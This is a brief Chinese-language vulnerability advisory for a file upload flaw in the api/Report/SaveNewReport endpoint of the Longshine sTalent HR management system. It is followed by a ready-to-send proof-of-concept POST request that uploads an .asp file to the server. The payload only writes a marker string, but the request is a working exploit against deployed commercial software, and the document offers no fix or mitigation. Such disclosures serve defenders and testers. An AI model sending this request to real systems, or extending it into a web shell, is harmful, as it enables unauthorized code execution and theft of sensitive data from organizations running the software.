漏洞描述
北京朗新天霁软件技术有限公司开发的朗新sTalent系统是一款专注于解决跨地域、多层次集团发展过程中人力资源管控、协调性及资源共享问题的系统。该系统的 api/Report/SaveNewReport 接口存在文件上传漏洞,攻击者可通过上传恶意文件实现命令执行,从而获取敏感信息并对系统造成严重威胁。
朗新sTalent api/Report/SaveNewReport 文件上传漏洞
PoC代码
POST /api/Report/SaveNewReport?rptId=2 HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=7e14e267b081de44454417c892579161b33a66cefc9023d14918e3be82cf
--7e14e267b081de44454417c892579161b33a66cefc9023d14918e3be82cf
Content-Disposition: form-data; name="file"; filename="8Eb583cB.asp"
Content-Type: application/octet-stream
<%Response.Write("A735FBD4")%>
--7e14e267b081de44454417c892579161b33a66cefc9023d14918e3be82cf--